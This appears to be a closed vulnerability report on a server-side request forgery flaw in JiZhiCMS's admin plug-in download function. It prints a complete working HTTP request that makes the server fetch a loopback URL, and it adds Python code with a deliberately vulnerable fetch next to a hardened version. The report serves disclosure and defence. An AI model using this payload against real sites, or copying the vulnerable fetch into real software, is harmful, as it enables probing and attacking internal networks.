Closed
Description
An SSRF vulnerability with echo (the fetched response is returned to the attacker) exists in the CMS admin backend. An attacker can use it to scan local and intranet ports, attack local and intranet services (including other JiZhiCMS admin backends), or carry out DoS attacks.
The vulnerability is in the admin-backend plug-in download function.
I start a locally accessible web service that serves a flag.php file,
then use the payload:
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.48.135
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.48.135
Referer: http://192.168.48.135//admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=821f3d50fa8cd84139c76be9
Connection: close
action=start-download&filepath=mutisite&download_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php

See the response.
In a browser, access http://192.168.48.135/cache/update_mutisite.zip
Open it with Notepad.
The content is the same as flag.php: the file was read successfully.
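The procedure above shows the pattern: the `start-download` action fetches whatever `download_url` says, server-side, and stores the body as `cache/update_<filepath>.zip`, which the web server then hands back to anyone who asks. The following Python is an added example, not JiZhiCMS code, that models that handler beside a hardened one: the hardened fetch allows only HTTPS to an allowlisted host on port 443, refuses a `filepath` that could leave `cache/`, resolves the host and rejects loopback, private, link-local and IPv4-mapped addresses, and does not follow redirects (a 3xx from the allowed host pointing at 127.0.0.1 would otherwise reopen the hole). The allowlist host `plugins.example.com`, the port numbers and the local "flag" server are assumptions for illustration.

```python
"""Added example (not JiZhiCMS code): the SSRF pattern from the report, modelled
in Python, beside a hardened fetch.  Host names, ports and the allowlist below
are assumptions for illustration."""
import ipaddress
import re
import socket
import urllib.request
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"plugins.example.com"}           # assumption: the only plug-in source
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # what a plug-in name may look like


def cache_path(filepath: str) -> str:
    """Where the report shows the fetched body landing (cache/update_<filepath>.zip)."""
    return f"cache/update_{filepath}.zip"


def vulnerable_fetch(download_url: str) -> bytes:
    """The reported behaviour: any scheme/host/port the attacker supplies is fetched
    by the server, so download_url=http://127.0.0.1:8888/flag.php reads a
    loopback-only service and the response is echoed back via the cache file."""
    with urllib.request.urlopen(download_url, timeout=5) as resp:  # SSRF
        return resp.read()


def _resolve(host: str) -> list:
    infos = socket.getaddrinfo(host, 443, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def _is_public(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return addr.is_global                  # rejects loopback, private, link-local, ...


def validate_download_url(url: str, resolver=None) -> list:
    """Return the public IPs an acceptable plug-in URL resolves to, else raise.
    resolver(host) -> [ip, ...] lets a test inject addresses without DNS."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("userinfo in URL not allowed")  # https://allowed@127.0.0.1/
    host = parts.hostname or ""
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not allowed: {host!r}")
    if parts.port not in (None, 443):
        raise ValueError(f"port not allowed: {parts.port}")
    ips = (resolver or _resolve)(host)
    bad = [ip for ip in ips if not _is_public(ip)]
    if not ips or bad:
        raise ValueError(f"{host} resolves to non-public address(es): {bad or ips}")
    return ips


def validate_filepath(filepath: str) -> str:
    """Keep the cache file name inside cache/ and free of traversal characters."""
    if not SAFE_NAME.match(filepath):
        raise ValueError(f"bad plug-in name: {filepath!r}")
    return filepath


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # A 3xx from the allowlisted host could point back at 127.0.0.1; refuse it.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def hardened_fetch(download_url: str, filepath: str = "plugin", resolver=None) -> bytes:
    """Validate first, then fetch without following redirects.  Caveat: urlopen
    re-resolves the name, so a DNS-rebinding host could change its answer between
    check and use; in production pin the validated IP at the socket layer."""
    validate_download_url(download_url, resolver)
    validate_filepath(filepath)
    opener = urllib.request.build_opener(_NoRedirect())
    with opener.open(download_url, timeout=5) as resp:
        return resp.read()


if __name__ == "__main__":
    import threading
    from http.server import BaseHTTPRequestHandler, HTTPServer

    class Flag(BaseHTTPRequestHandler):    # constructed stand-in for the reporter's flag.php
        def do_GET(self):
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"flag{constructed-local-only}")

        def log_message(self, *args):
            pass

    srv = HTTPServer(("127.0.0.1", 0), Flag)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{srv.server_port}/flag.php"
    print("vulnerable handler returned:", vulnerable_fetch(url))
    try:
        hardened_fetch(url, "mutisite")
    except ValueError as err:
        print("hardened handler refused:", err)
    srv.shutdown()
```

Run stand-alone, the script starts a loopback-only listener on an ephemeral port, shows `vulnerable_fetch` pulling its content exactly as the report's `download_url=http://127.0.0.1:8888/flag.php` does, and shows `hardened_fetch` refusing the same URL at the scheme check before any connection is made. The port-scan angle in the description follows from the same handler: with an echo, a closed port, an open HTTP port and a non-HTTP service each produce distinguishable responses, which is why the fix has to reject the destination up front rather than filter what comes back.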